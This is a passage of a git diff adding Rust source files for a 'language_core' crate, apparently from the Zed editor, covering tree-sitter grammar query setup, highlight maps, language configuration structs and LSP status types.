open_capture_ix), + Capture::Optional("close", &mut close_capture_ix), + Capture::Optional("annotation", &mut annotation_capture_ix), + ], + ) { + self.outline_config = Some(OutlineConfig { + query, + item_capture_ix, + name_capture_ix, + context_capture_ix, + extra_context_capture_ix, + open_capture_ix, + close_capture_ix, + annotation_capture_ix, + }); + } + Ok(self) + } + + pub fn with_text_object_query( + mut self, + source: &str, + language_name: &LanguageName, + ) -> Result { + let query = Query::new(&self.ts_language, source)?; + + let mut text_objects_by_capture_ix = Vec::new(); + for (ix, name) in query.capture_names().iter().enumerate() { + if let Some(text_object) = TextObject::from_capture_name(name) { + text_objects_by_capture_ix.push((ix as u32, text_object)); + } else { + log::warn!( + "unrecognized capture name '{}' in {} textobjects TreeSitter query", + name, + language_name, + ); + } + } + + self.text_object_config = Some(TextObjectConfig { + query, + text_objects_by_capture_ix, + }); + Ok(self) + } + + pub fn with_debug_variables_query( + mut self, + source: &str, + language_name: &LanguageName, + ) -> Result { + let query = Query::new(&self.ts_language, source)?; + + let mut objects_by_capture_ix = Vec::new(); + for (ix, name) in query.capture_names().iter().enumerate() { + if let Some(text_object) = DebuggerTextObject::from_capture_name(name) { + objects_by_capture_ix.push((ix as u32, text_object)); + } else { + log::warn!( + "unrecognized capture name '{}' in {} debugger TreeSitter query", + name, + language_name, + ); + } + } + + self.debug_variables_config = Some(DebugVariablesConfig { + query, + objects_by_capture_ix, + }); + Ok(self) + } + + pub fn with_brackets_query( + mut self, + source: &str, + language_name: &LanguageName, + ) -> Result { + let query = Query::new(&self.ts_language, source)?; + let mut open_capture_ix = 0; + let mut close_capture_ix = 0; + if populate_capture_indices( + &query, + language_name, + "brackets", + &[], + &mut [ + Capture::Required("open", &mut open_capture_ix), + Capture::Required("close", &mut close_capture_ix), + ], + ) { + let patterns = (0..query.pattern_count()) + .map(|ix| { + let mut config = BracketsPatternConfig::default(); + for setting in query.property_settings(ix) { + let setting_key = setting.key.as_ref(); + if setting_key == "newline.only" { + config.newline_only = true + } + if setting_key == "rainbow.exclude" { + config.rainbow_exclude = true + } + } + config + }) + .collect(); + self.brackets_config = Some(BracketsConfig { + query, + open_capture_ix, + close_capture_ix, + patterns, + }); + } + Ok(self) + } + + pub fn with_indents_query( + mut self, + source: &str, + language_name: &LanguageName, + ) -> Result { + let query = Query::new(&self.ts_language, source)?; + let mut indent_capture_ix = 0; + let mut start_capture_ix = None; + let mut end_capture_ix = None; + let mut outdent_capture_ix = None; + if populate_capture_indices( + &query, + language_name, + "indents", + &["start."], + &mut [ + Capture::Required("indent", &mut indent_capture_ix), + Capture::Optional("start", &mut start_capture_ix), + Capture::Optional("end", &mut end_capture_ix), + Capture::Optional("outdent", &mut outdent_capture_ix), + ], + ) { + let mut suffixed_start_captures = HashMap::default(); + for (ix, name) in query.capture_names().iter().enumerate() { + if let Some(suffix) = name.strip_prefix("start.") { + suffixed_start_captures.insert(ix as u32, suffix.to_owned().into()); + } + } + + self.indents_config = Some(IndentConfig { + query, + indent_capture_ix, + start_capture_ix, + end_capture_ix, + outdent_capture_ix, + suffixed_start_captures, + }); + } + Ok(self) + } + + pub fn with_injection_query( + mut self, + source: &str, + language_name: &LanguageName, + ) -> Result { + let query = Query::new(&self.ts_language, source)?; + let mut language_capture_ix = None; + let mut injection_language_capture_ix = None; + let mut content_capture_ix = None; + let mut injection_content_capture_ix = None; + if populate_capture_indices( + &query, + language_name, + "injections", + &[], + &mut [ + Capture::Optional("language", &mut language_capture_ix), + Capture::Optional("injection.language", &mut injection_language_capture_ix), + Capture::Optional("content", &mut content_capture_ix), + Capture::Optional("injection.content", &mut injection_content_capture_ix), + ], + ) { + language_capture_ix = match (language_capture_ix, injection_language_capture_ix) { + (None, Some(ix)) => Some(ix), + (Some(_), Some(_)) => { + anyhow::bail!("both language and injection.language captures are present"); + } + _ => language_capture_ix, + }; + content_capture_ix = match (content_capture_ix, injection_content_capture_ix) { + (None, Some(ix)) => Some(ix), + (Some(_), Some(_)) => { + anyhow::bail!("both content and injection.content captures are present") + } + _ => content_capture_ix, + }; + let patterns = (0..query.pattern_count()) + .map(|ix| { + let mut config = InjectionPatternConfig::default(); + for setting in query.property_settings(ix) { + match setting.key.as_ref() { + "language" | "injection.language" => { + config.language.clone_from(&setting.value); + } + "combined" | "injection.combined" => { + config.combined = true; + } + _ => {} + } + } + config + }) + .collect(); + if let Some(content_capture_ix) = content_capture_ix { + self.injection_config = Some(InjectionConfig { + query, + language_capture_ix, + content_capture_ix, + patterns, + }); + } else { + log::error!( + "missing required capture in injections {} TreeSitter query: \ + content or injection.content", + language_name, + ); + } + } + Ok(self) + } + + pub fn with_override_query( + mut self, + source: &str, + language_name: &LanguageName, + overrides: &HashMap, + brackets: &mut BracketPairConfig, + scope_opt_in_language_servers: &[LanguageServerName], + ) -> Result { + let query = Query::new(&self.ts_language, source)?; + + let mut override_configs_by_id = HashMap::default(); + for (ix, mut name) in query.capture_names().iter().copied().enumerate() { + let mut range_is_inclusive = false; + if name.starts_with('_') { + continue; + } + if let Some(prefix) = name.strip_suffix(".inclusive") { + name = prefix; + range_is_inclusive = true; + } + + let value = overrides.get(name).cloned().unwrap_or_default(); + for server_name in &value.opt_into_language_servers { + if !scope_opt_in_language_servers.contains(server_name) { + util::debug_panic!( + "Server {server_name:?} has been opted-in by scope {name:?} but has not been marked as an opt-in server" + ); + } + } + + override_configs_by_id.insert( + ix as u32, + OverrideEntry { + name: name.to_string(), + range_is_inclusive, + value, + }, + ); + } + + let referenced_override_names = overrides + .keys() + .chain(brackets.disabled_scopes_by_bracket_ix.iter().flatten()); + + for referenced_name in referenced_override_names { + if !override_configs_by_id + .values() + .any(|entry| entry.name == *referenced_name) + { + anyhow::bail!( + "language {:?} has overrides in config not in query: {referenced_name:?}", + language_name + ); + } + } + + for entry in override_configs_by_id.values_mut() { + entry.value.disabled_bracket_ixs = brackets + .disabled_scopes_by_bracket_ix + .iter() + .enumerate() + .filter_map(|(ix, disabled_scope_names)| { + if disabled_scope_names.contains(&entry.name) { + Some(ix as u16) + } else { + None + } + }) + .collect(); + } + + brackets.disabled_scopes_by_bracket_ix.clear(); + + self.override_config = Some(OverrideConfig { + query, + values: override_configs_by_id, + }); + Ok(self) + } + + pub fn with_redaction_query( + mut self, + source: &str, + language_name: &LanguageName, + ) -> Result { + let query = Query::new(&self.ts_language, source)?; + let mut redaction_capture_ix = 0; + if populate_capture_indices( + &query, + language_name, + "redactions", + &[], + &mut [Capture::Required("redact", &mut redaction_capture_ix)], + ) { + self.redactions_config = Some(RedactionConfig { + query, + redaction_capture_ix, + }); + } + Ok(self) + } +} diff --git a/crates/language_core/src/highlight_map.rs b/crates/language_core/src/highlight_map.rs new file mode 100644 index 0000000000000000000000000000000000000000..cba5cda6f7501a04966d5ce512e2fed700724d1a --- /dev/null +++ b/crates/language_core/src/highlight_map.rs @@ -0,0 +1,40 @@ +use std::{num::NonZeroU32, sync::Arc}; + +#[derive(Clone, Debug)] +pub struct HighlightMap(Arc<[Option]>); + +#[derive(Clone, Copy, Debug, PartialEq, Eq)] +pub struct HighlightId(NonZeroU32); + +impl HighlightId { + pub const TABSTOP_INSERT_ID: HighlightId = HighlightId(NonZeroU32::new(u32::MAX - 1).unwrap()); + pub const TABSTOP_REPLACE_ID: HighlightId = HighlightId(NonZeroU32::new(u32::MAX - 2).unwrap()); + + pub fn new(capture_id: u32) -> Self { + Self(NonZeroU32::new(capture_id + 1).unwrap_or(NonZeroU32::MAX)) + } +} + +impl From for usize { + fn from(value: HighlightId) -> Self { + value.0.get() as usize - 1 + } +} + +impl HighlightMap { + #[inline] + pub fn from_ids(highlight_ids: impl IntoIterator>) -> Self { + Self(highlight_ids.into_iter().collect()) + } + + #[inline] + pub fn get(&self, capture_id: u32) -> Option { + self.0.get(capture_id as usize).copied().flatten() + } +} + +impl Default for HighlightMap { + fn default() -> Self { + Self(Arc::new([])) + } +} diff --git a/crates/language_core/src/language_config.rs b/crates/language_core/src/language_config.rs new file mode 100644 index 0000000000000000000000000000000000000000..f412af418b7948b40e3bdac5a3a649d12d008e8a --- /dev/null +++ b/crates/language_core/src/language_config.rs @@ -0,0 +1,528 @@ +use crate::LanguageName; +use collections::{HashMap, HashSet, IndexSet}; +use gpui::SharedString; +use lsp::LanguageServerName; +use regex::Regex; +use schemars::{JsonSchema, SchemaGenerator, json_schema}; +use serde::{Deserialize, Deserializer, Serialize, Serializer, de}; +use std::{num::NonZeroU32, path::Path, sync::Arc}; +use util::serde::default_true; + +/// Controls the soft-wrapping behavior in the editor. +#[derive(Copy, Clone, Debug, Serialize, Deserialize, PartialEq, Eq, JsonSchema)] +#[serde(rename_all = "snake_case")] +pub enum SoftWrap { + /// Prefer a single line generally, unless an overly long line is encountered. + None, + /// Deprecated: use None instead. Left to avoid breaking existing users' configs. + /// Prefer a single line generally, unless an overly long line is encountered. + PreferLine, + /// Soft wrap lines that exceed the editor width. + EditorWidth, + /// Soft wrap lines at the preferred line length. + PreferredLineLength, + /// Soft wrap line at the preferred line length or the editor width (whichever is smaller). + Bounded, +} + +/// Top-level configuration for a language, typically loaded from a `config.toml` +/// shipped alongside the grammar. +#[derive(Clone, Debug, Deserialize, JsonSchema)] +pub struct LanguageConfig { + /// Human-readable name of the language. + pub name: LanguageName, + /// The name of this language for a Markdown code fence block + pub code_fence_block_name: Option>, + /// Alternative language names that Jupyter kernels may report for this language. + /// Used when a kernel's `language` field differs from Zed's language name. + /// For example, the Nu extension would set this to `["nushell"]`. + #[serde(default)] + pub kernel_language_names: Vec>, + // The name of the grammar in a WASM bundle (experimental). + pub grammar: Option>, + /// The criteria for matching this language to a given file. + #[serde(flatten)] + pub matcher: LanguageMatcher, + /// List of bracket types in a language. + #[serde(default)] + pub brackets: BracketPairConfig, + /// If set to true, auto indentation uses last non empty line to determine + /// the indentation level for a new line. + #[serde(default = "auto_indent_using_last_non_empty_line_default")] + pub auto_indent_using_last_non_empty_line: bool, + // Whether indentation of pasted content should be adjusted based on the context. + #[serde(default)] + pub auto_indent_on_paste: Option, + /// A regex that is used to determine whether the indentation level should be + /// increased in the following line. + #[serde(default, deserialize_with = "deserialize_regex")] + #[schemars(schema_with = "regex_json_schema")] + pub increase_indent_pattern: Option, + /// A regex that is used to determine whether the indentation level should be + /// decreased in the following line. + #[serde(default, deserialize_with = "deserialize_regex")] + #[schemars(schema_with = "regex_json_schema")] + pub decrease_indent_pattern: Option, + /// A list of rules for decreasing indentation. Each rule pairs a regex with a set of valid + /// "block-starting" tokens. When a line matches a pattern, its indentation is aligned with + /// the most recent line that began with a corresponding token. This enables context-aware + /// outdenting, like aligning an `else` with its `if`. + #[serde(default)] + pub decrease_indent_patterns: Vec, + /// A list of characters that trigger the automatic insertion of a closing + /// bracket when they immediately precede the point where an opening + /// bracket is inserted. + #[serde(default)] + pub autoclose_before: String, + /// A placeholder used internally by Semantic Index. + #[serde(default)] + pub collapsed_placeholder: String, + /// A line comment string that is inserted in e.g. `toggle comments` action. + /// A language can have multiple flavours of line comments. All of the provided line comments are + /// used for comment continuations on the next line, but only the first one is used for Editor::ToggleComments. + #[serde(default)] + pub line_comments: Vec>, + /// Delimiters and configuration for recognizing and formatting block comments. + #[serde(default)] + pub block_comment: Option, + /// Delimiters and configuration for recognizing and formatting documentation comments. + #[serde(default, alias = "documentation")] + pub documentation_comment: Option, + /// List markers that are inserted unchanged on newline (e.g., `- `, `* `, `+ `). + #[serde(default)] + pub unordered_list: Vec>, + /// Configuration for ordered lists with auto-incrementing numbers on newline (e.g., `1. ` becomes `2. `). + #[serde(default)] + pub ordered_list: Vec, + /// Configuration for task lists where multiple markers map to a single continuation prefix (e.g., `- [x] ` continues as `- [ ] `). + #[serde(default)] + pub task_list: Option, + /// A list of additional regex patterns that should be treated as prefixes + /// for creating boundaries during rewrapping, ensuring content from one + /// prefixed section doesn't merge with another (e.g., markdown list items). + /// By default, Zed treats as paragraph and comment prefixes as boundaries. + #[serde(default, deserialize_with = "deserialize_regex_vec")] + #[schemars(schema_with = "regex_vec_json_schema")] + pub rewrap_prefixes: Vec, + /// A list of language servers that are allowed to run on subranges of a given language. + #[serde(default)] + pub scope_opt_in_language_servers: Vec, + #[serde(default)] + pub overrides: HashMap, + /// A list of characters that Zed should treat as word characters for the + /// purpose of features that operate on word boundaries, like 'move to next word end' + /// or a whole-word search in buffer search. + #[serde(default)] + pub word_characters: HashSet, + /// Whether to indent lines using tab characters, as opposed to multiple + /// spaces. + #[serde(default)] + pub hard_tabs: Option, + /// How many columns a tab should occupy. + #[serde(default)] + #[schemars(range(min = 1, max = 128))] + pub tab_size: Option, + /// How to soft-wrap long lines of text. + #[serde(default)] + pub soft_wrap: Option, + /// When set, selections can be wrapped using prefix/suffix pairs on both sides. + #[serde(default)] + pub wrap_characters: Option, + /// The name of a Prettier parser that will be used for this language when no file path is available. + /// If there's a parser name in the language settings, that will be used instead. + #[serde(default)] + pub prettier_parser_name: Option, + /// If true, this language is only for syntax highlighting via an injection into other + /// languages, but should not appear to the user as a distinct language. + #[serde(default)] + pub hidden: bool, + /// If configured, this language contains JSX style tags, and should support auto-closing of those tags. + #[serde(default)] + pub jsx_tag_auto_close: Option, + /// A list of characters that Zed should treat as word characters for completion queries. + #[serde(default)] + pub completion_query_characters: HashSet, + /// A list of characters that Zed should treat as word characters for linked edit operations. + #[serde(default)] + pub linked_edit_characters: HashSet, + /// A list of preferred debuggers for this language. + #[serde(default)] + pub debuggers: IndexSet, +} + +impl LanguageConfig { + pub const FILE_NAME: &str = "config.toml"; + + pub fn load(config_path: impl AsRef) -> anyhow::Result { + let config = std::fs::read_to_string(config_path.as_ref())?; + toml::from_str(&config).map_err(Into::into) + } +} + +impl Default for LanguageConfig { + fn default() -> Self { + Self { + name: LanguageName::new_static(""), + code_fence_block_name: None, + kernel_language_names: Default::default(), + grammar: None, + matcher: LanguageMatcher::default(), + brackets: Default::default(), + auto_indent_using_last_non_empty_line: auto_indent_using_last_non_empty_line_default(), + auto_indent_on_paste: None, + increase_indent_pattern: Default::default(), + decrease_indent_pattern: Default::default(), + decrease_indent_patterns: Default::default(), + autoclose_before: Default::default(), + line_comments: Default::default(), + block_comment: Default::default(), + documentation_comment: Default::default(), + unordered_list: Default::default(), + ordered_list: Default::default(), + task_list: Default::default(), + rewrap_prefixes: Default::default(), + scope_opt_in_language_servers: Default::default(), + overrides: Default::default(), + word_characters: Default::default(), + collapsed_placeholder: Default::default(), + hard_tabs: None, + tab_size: None, + soft_wrap: None, + wrap_characters: None, + prettier_parser_name: None, + hidden: false, + jsx_tag_auto_close: None, + completion_query_characters: Default::default(), + linked_edit_characters: Default::default(), + debuggers: Default::default(), + } + } +} + +#[derive(Clone, Debug, Deserialize, Default, JsonSchema)] +pub struct DecreaseIndentConfig { + #[serde(default, deserialize_with = "deserialize_regex")] + #[schemars(schema_with = "regex_json_schema")] + pub pattern: Option, + #[serde(default)] + pub valid_after: Vec, +} + +/// Configuration for continuing ordered lists with auto-incrementing numbers. +#[derive(Clone, Debug, Deserialize, JsonSchema)] +pub struct OrderedListConfig { + /// A regex pattern with a capture group for the number portion (e.g., `(\\d+)\\. `). + pub pattern: String, + /// A format string where `{1}` is replaced with the incremented number (e.g., `{1}. `). + pub format: String, +} + +/// Configuration for continuing task lists on newline. +#[derive(Clone, Debug, Deserialize, JsonSchema)] +pub struct TaskListConfig { + /// The list markers to match (e.g., `- [ ] `, `- [x] `). + pub prefixes: Vec>, + /// The marker to insert when continuing the list on a new line (e.g., `- [ ] `). + pub continuation: Arc, +} + +#[derive(Clone, Debug, Serialize, Deserialize, Default, JsonSchema)] +pub struct LanguageMatcher { + /// Given a list of `LanguageConfig`'s, the language of a file can be determined based on the path extension matching any of the `path_suffixes`. + #[serde(default)] + pub path_suffixes: Vec, + /// A regex pattern that determines whether the language should be assigned to a file or not. + #[serde( + default, + serialize_with = "serialize_regex", + deserialize_with = "deserialize_regex" + )] + #[schemars(schema_with = "regex_json_schema")] + pub first_line_pattern: Option, + /// Alternative names for this language used in vim/emacs modelines. + /// These are matched case-insensitively against the `mode` (emacs) or + /// `filetype`/`ft` (vim) specified in the modeline. + #[serde(default)] + pub modeline_aliases: Vec, +} + +impl Ord for LanguageMatcher { + fn cmp(&self, other: &Self) -> std::cmp::Ordering { + self.path_suffixes + .cmp(&other.path_suffixes) + .then_with(|| { + self.first_line_pattern + .as_ref() + .map(Regex::as_str) + .cmp(&other.first_line_pattern.as_ref().map(Regex::as_str)) + }) + .then_with(|| self.modeline_aliases.cmp(&other.modeline_aliases)) + } +} + +impl PartialOrd for LanguageMatcher { + fn partial_cmp(&self, other: &Self) -> Option { + Some(self.cmp(other)) + } +} + +impl Eq for LanguageMatcher {} + +impl PartialEq for LanguageMatcher { + fn eq(&self, other: &Self) -> bool { + self.path_suffixes == other.path_suffixes + && self.first_line_pattern.as_ref().map(Regex::as_str) + == other.first_line_pattern.as_ref().map(Regex::as_str) + && self.modeline_aliases == other.modeline_aliases + } +} + +/// The configuration for JSX tag auto-closing. +#[derive(Clone, Deserialize, JsonSchema, Debug)] +pub struct JsxTagAutoCloseConfig { + /// The name of the node for a opening tag + pub open_tag_node_name: String, + /// The name of the node for an closing tag + pub close_tag_node_name: String, + /// The name of the node for a complete element with children for open and close tags + pub jsx_element_node_name: String, + /// The name of the node found within both opening and closing + /// tags that describes the tag name + pub tag_name_node_name: String, + /// Alternate Node names for tag names. + /// Specifically needed as TSX represents the name in `` + /// as `member_expression` rather than `identifier` as usual + #[serde(default)] + pub tag_name_node_name_alternates: Vec, + /// Some grammars are smart enough to detect a closing tag + /// that is not valid i.e. doesn't match it's corresponding + /// opening tag or does not have a corresponding opening tag + /// This should be set to the name of the node for invalid + /// closing tags if the grammar contains such a node, otherwise + /// detecting already closed tags will not work properly + #[serde(default)] + pub erroneous_close_tag_node_name: Option, + /// See above for erroneous_close_tag_node_name for details + /// This should be set if the node used for the tag name + /// within erroneous closing tags is different from the + /// normal tag name node name + #[serde(default)] + pub erroneous_close_tag_name_node_name: Option, +} + +/// The configuration for block comments for this language. +#[derive(Clone, Debug, JsonSchema, PartialEq)] +pub struct BlockCommentConfig { + /// A start tag of block comment. + pub start: Arc, + /// A end tag of block comment. + pub end: Arc, + /// A character to add as a prefix when a new line is added to a block comment. + pub prefix: Arc, + /// A indent to add for prefix and end line upon new line. + #[schemars(range(min = 1, max = 128))] + pub tab_size: u32, +} + +impl<'de> Deserialize<'de> for BlockCommentConfig { + fn deserialize(deserializer: D) -> Result + where + D: Deserializer<'de>, + { + #[derive(Deserialize)] + #[serde(untagged)] + enum BlockCommentConfigHelper { + New { + start: Arc, + end: Arc, + prefix: Arc, + tab_size: u32, + }, + Old([Arc; 2]), + } + + match BlockCommentConfigHelper::deserialize(deserializer)? { + BlockCommentConfigHelper::New { + start, + end, + prefix, + tab_size, + } => Ok(BlockCommentConfig { + start, + end, + prefix, + tab_size, + }), + BlockCommentConfigHelper::Old([start, end]) => Ok(BlockCommentConfig { + start, + end, + prefix: "".into(), + tab_size: 0, + }), + } + } +} + +#[derive(Clone, Deserialize, Default, Debug, JsonSchema)] +pub struct LanguageConfigOverride { + #[serde(default)] + pub line_comments: Override>>, + #[serde(default)] + pub block_comment: Override, + #[serde(skip)] + pub disabled_bracket_ixs: Vec, + #[serde(default)] + pub word_characters: Override>, + #[serde(default)] + pub completion_query_characters: Override>, + #[serde(default)] + pub linked_edit_characters: Override>, + #[serde(default)] + pub opt_into_language_servers: Vec, + #[serde(default)] + pub prefer_label_for_snippet: Option, +} + +#[derive(Clone, Deserialize, Debug, Serialize, JsonSchema)] +#[serde(untagged)] +pub enum Override { + Remove { remove: bool }, + Set(T), +} + +impl Default for Override { + fn default() -> Self { + Override::Remove { remove: false } + } +} + +impl Override { + pub fn as_option<'a>(this: Option<&'a Self>, original: Option<&'a T>) -> Option<&'a T> { + match this { + Some(Self::Set(value)) => Some(value), + Some(Self::Remove { remove: true }) => None, + Some(Self::Remove { remove: false }) | None => original, + } + } +} + +/// Configuration of handling bracket pairs for a given language. +/// +/// This struct includes settings for defining which pairs of characters are considered brackets and +/// also specifies any language-specific scopes where these pairs should be ignored for bracket matching purposes. +#[derive(Clone, Debug, Default, JsonSchema)] +#[schemars(with = "Vec::")] +pub struct BracketPairConfig { + /// A list of character pairs that should be treated as brackets in the context of a given language. + pub pairs: Vec, + /// A list of tree-sitter scopes for which a given bracket should not be active. + /// N-th entry in `[Self::disabled_scopes_by_bracket_ix]` contains a list of disabled scopes for an n-th entry in `[Self::pairs]` + pub disabled_scopes_by_bracket_ix: Vec>, +} + +impl BracketPairConfig { + pub fn is_closing_brace(&self, c: char) -> bool { + self.pairs.iter().any(|pair| pair.end.starts_with(c)) + } +} + +#[derive(Deserialize, JsonSchema)] +pub struct BracketPairContent { + #[serde(flatten)] + pub bracket_pair: BracketPair, + #[serde(default)] + pub not_in: Vec, +} + +impl<'de> Deserialize<'de> for BracketPairConfig { + fn deserialize(deserializer: D) -> std::result::Result + where + D: Deserializer<'de>, + { + let result = Vec::::deserialize(deserializer)?; + let (brackets, disabled_scopes_by_bracket_ix) = result + .into_iter() + .map(|entry| (entry.bracket_pair, entry.not_in)) + .unzip(); + + Ok(BracketPairConfig { + pairs: brackets, + disabled_scopes_by_bracket_ix, + }) + } +} + +/// Describes a single bracket pair and how an editor should react to e.g. inserting +/// an opening bracket or to a newline character insertion in between `start` and `end` characters. +#[derive(Clone, Debug, Default, Deserialize, PartialEq, JsonSchema)] +pub struct BracketPair { + /// Starting substring for a bracket. + pub start: String, + /// Ending substring for a bracket. + pub end: String, + /// True if `end` should be automatically inserted right after `start` characters. + pub close: bool, + /// True if selected text should be surrounded by `start` and `end` characters. + #[serde(default = "default_true")] + pub surround: bool, + /// True if an extra newline should be inserted while the cursor is in the middle + /// of that bracket pair. + pub newline: bool, +} + +#[derive(Clone, Debug, Deserialize, JsonSchema)] +pub struct WrapCharactersConfig { + /// Opening token split into a prefix and suffix. The first caret goes + /// after the prefix (i.e., between prefix and suffix). + pub start_prefix: String, + pub start_suffix: String, + /// Closing token split into a prefix and suffix. The second caret goes + /// after the prefix (i.e., between prefix and suffix). + pub end_prefix: String, + pub end_suffix: String, +} + +pub fn auto_indent_using_last_non_empty_line_default() -> bool { + true +} + +pub fn deserialize_regex<'de, D: Deserializer<'de>>(d: D) -> Result, D::Error> { + let source = Option::::deserialize(d)?; + if let Some(source) = source { + Ok(Some(regex::Regex::new(&source).map_err(de::Error::custom)?)) + } else { + Ok(None) + } +} + +pub fn regex_json_schema(_: &mut schemars::SchemaGenerator) -> schemars::Schema { + json_schema!({ + "type": "string" + }) +} + +pub fn serialize_regex(regex: &Option, serializer: S) -> Result +where + S: Serializer, +{ + match regex { + Some(regex) => serializer.serialize_str(regex.as_str()), + None => serializer.serialize_none(), + } +} + +pub fn deserialize_regex_vec<'de, D: Deserializer<'de>>(d: D) -> Result, D::Error> { + let sources = Vec::::deserialize(d)?; + sources + .into_iter() + .map(|source| regex::Regex::new(&source)) + .collect::>() + .map_err(de::Error::custom) +} + +pub fn regex_vec_json_schema(_: &mut SchemaGenerator) -> schemars::Schema { + json_schema!({ + "type": "array", + "items": { "type": "string" } + }) +} diff --git a/crates/language_core/src/language_core.rs b/crates/language_core/src/language_core.rs new file mode 100644 index 0000000000000000000000000000000000000000..f3292e1978d976ce638ebe26c079b939648ffe52 --- /dev/null +++ b/crates/language_core/src/language_core.rs @@ -0,0 +1,39 @@ +// language_core: tree-sitter grammar infrastructure, LSP adapter traits, +// language configuration, and highlight mapping. + +pub mod diagnostic; +pub mod grammar; +pub mod highlight_map; +pub mod language_config; + +pub use diagnostic::{Diagnostic, DiagnosticSourceKind}; +pub use grammar::{ + BracketsConfig, BracketsPatternConfig, DebugVariablesConfig, DebuggerTextObject, Grammar, + GrammarId, HighlightsConfig, IndentConfig, InjectionConfig, InjectionPatternConfig, + NEXT_GRAMMAR_ID, OutlineConfig, OverrideConfig, OverrideEntry, RedactionConfig, + RunnableCapture, RunnableConfig, TextObject, TextObjectConfig, +}; +pub use highlight_map::{HighlightId, HighlightMap}; +pub use language_config::{ + BlockCommentConfig, BracketPair, BracketPairConfig, BracketPairContent, DecreaseIndentConfig, + JsxTagAutoCloseConfig, LanguageConfig, LanguageConfigOverride, LanguageMatcher, + OrderedListConfig, Override, SoftWrap, TaskListConfig, WrapCharactersConfig, + auto_indent_using_last_non_empty_line_default, deserialize_regex, deserialize_regex_vec, + regex_json_schema, regex_vec_json_schema, serialize_regex, +}; + +pub mod code_label; +pub mod language_name; +pub mod lsp_adapter; +pub mod manifest; +pub mod queries; +pub mod toolchain; + +pub use code_label::{CodeLabel, CodeLabelBuilder, Symbol}; +pub use language_name::{LanguageId, LanguageName}; +pub use lsp_adapter::{ + BinaryStatus, LanguageServerStatusUpdate, PromptResponseContext, ServerHealth, ToLspPosition, +}; +pub use manifest::ManifestName; +pub use queries::{LanguageQueries, QUERY_FILENAME_PREFIXES}; +pub use toolchain::{Toolchain, ToolchainList, ToolchainMetadata, ToolchainScope}; diff --git a/crates/language_core/src/language_name.rs b/crates/language_core/src/language_name.rs new file mode 100644 index 0000000000000000000000000000000000000000..764b54a48a566ad98212de3e22bce6aca9a1e393 --- /dev/null +++ b/crates/language_core/src/language_name.rs @@ -0,0 +1,109 @@ +use gpui::SharedString; +use schemars::JsonSchema; +use serde::{Deserialize, Serialize}; +use std::{ + borrow::Borrow, + sync::atomic::{AtomicUsize, Ordering::SeqCst}, +}; + +static NEXT_LANGUAGE_ID: AtomicUsize = AtomicUsize::new(0); + +#[derive(Debug, PartialEq, Eq, PartialOrd, Ord, Hash, Clone, Copy)] +pub struct LanguageId(usize); + +impl LanguageId { + pub fn new() -> Self { + Self(NEXT_LANGUAGE_ID.fetch_add(1, SeqCst)) + } +} + +impl Default for LanguageId { + fn default() -> Self { + Self::new() + } +} + +#[derive( + Debug, Clone, Hash, PartialEq, Eq, PartialOrd, Ord, Serialize, Deserialize, JsonSchema, +)] +pub struct LanguageName(pub SharedString); + +impl LanguageName { + pub fn new(s: &str) -> Self { + Self(SharedString::new(s)) + } + + pub fn new_static(s: &'static str) -> Self { + Self(SharedString::new_static(s)) + } + + pub fn from_proto(s: String) -> Self { + Self(SharedString::from(s)) + } + + pub fn to_proto(&self) -> String { + self.0.to_string() + } + + pub fn lsp_id(&self) -> String { + match self.0.as_ref() { + "Plain Text" => "plaintext".to_string(), + language_name => language_name.to_lowercase(), + } + } +} + +impl From for SharedString { + fn from(value: LanguageName) -> Self { + value.0 + } +} + +impl From for LanguageName { + fn from(value: SharedString) -> Self { + LanguageName(value) + } +} + +impl AsRef for LanguageName { + fn as_ref(&self) -> &str { + self.0.as_ref() + } +} + +impl Borrow for LanguageName { + fn borrow(&self) -> &str { + self.0.as_ref() + } +} + +impl PartialEq for LanguageName { + fn eq(&self, other: &str) -> bool { + self.0.as_ref() == other + } +} + +impl PartialEq<&str> for LanguageName { + fn eq(&self, other: &&str) -> bool { + self.0.as_ref() == *other + } +} + +impl std::fmt::Display for LanguageName { + fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result { + write!(f, "{}", self.0) + } +} + +impl From<&'static str> for LanguageName { + fn from(str: &'static str) -> Self { + Self(SharedString::new_static(str)) + } +} + +impl From for String { + fn from(value: LanguageName) -> Self { + let value: &str = &value.0; + Self::from(value) + } +} diff --git a/crates/language_core/src/lsp_adapter.rs b/crates/language_core/src/lsp_adapter.rs new file mode 100644 index 0000000000000000000000000000000000000000..03012f71143428b49ea9d75a03b0118b50e413b4 --- /dev/null +++ b/crates/language_core/src/lsp_adapter.rs @@ -0,0 +1,44 @@ +use gpui::SharedString; +use serde::{Deserialize, Serialize}; + +/// Converts a value into an LSP position. +pub trait ToLspPosition { + /// Converts the value into an LSP position. + fn to_lsp_position(self) -> lsp::Position; +} + +/// Context provided to LSP adapters when a user responds to a ShowMessageRequest prompt. +/// This allows adapters to intercept preference selections (like "Always" or "Never") +/// and potentially persist them to Zed's settings. +#[derive(Debug, Clone)] +pub struct PromptResponseContext { + /// The original message shown to the user + pub message: String, + /// The action (button) the user selected + pub selected_action: lsp::MessageActionItem, +} + +#[derive(Clone, Debug, PartialEq, Eq)] +pub enum LanguageServerStatusUpdate { + Binary(BinaryStatus), + Health(ServerHealth, Option), +} + +#[derive(Debug, PartialEq, Eq, Deserialize, Serialize, Clone, Copy)] +#[serde(rename_all = "camelCase")] +pub enum ServerHealth { + Ok, + Warning, + Error, +} + +#[derive(Clone, Debug, PartialEq, Eq)] +pub enum BinaryStatus { + None, + CheckingForUpdate, + Downloading, + Starting, + Stopping, + Stopped, + Failed { error: String }, +} diff --git a/crates/language_core/src/manifest.rs b/crates/language_core/src/manifest.rs new file mode 100644 index 0000000000000000000000000000000000000000..1e762ff6e7c364eef02eea16ce9e1ecaaa198554 --- /dev/null +++ b/crates/language_core/src/manifest.rs @@ -0,0 +1,36 @@ +use std::borrow::Borrow; + +use gpui::SharedString; + +#[derive(Clone, Debug, PartialEq, Eq, Hash, PartialOrd, Ord)] +pub struct ManifestName(SharedString); + +impl Borrow for ManifestName { + fn borrow(&self) -> &SharedString { + &self.0 + } +} + +impl Borrow for ManifestName { + fn borrow(&self) -> &str { + &self.0 + } +} + +impl From for ManifestName { + fn from(value: SharedString) -> Self { + Self(value) + } +} + +impl From for SharedString { + fn from(value: ManifestName) -> Self { + value.0 + } +} + +impl AsRef for ManifestName { + fn as_ref(&self) -> &SharedString { + &self.0 + } +} diff --git a/crates/language_core/src/queries.rs b/crates/language_core/src/queries.rs new file mode 100644 index 0000000000000000000000000000000000000000..510fb2e03c9b3a6876a2d72180ea238c9a3be4b6 --- /dev/null +++ 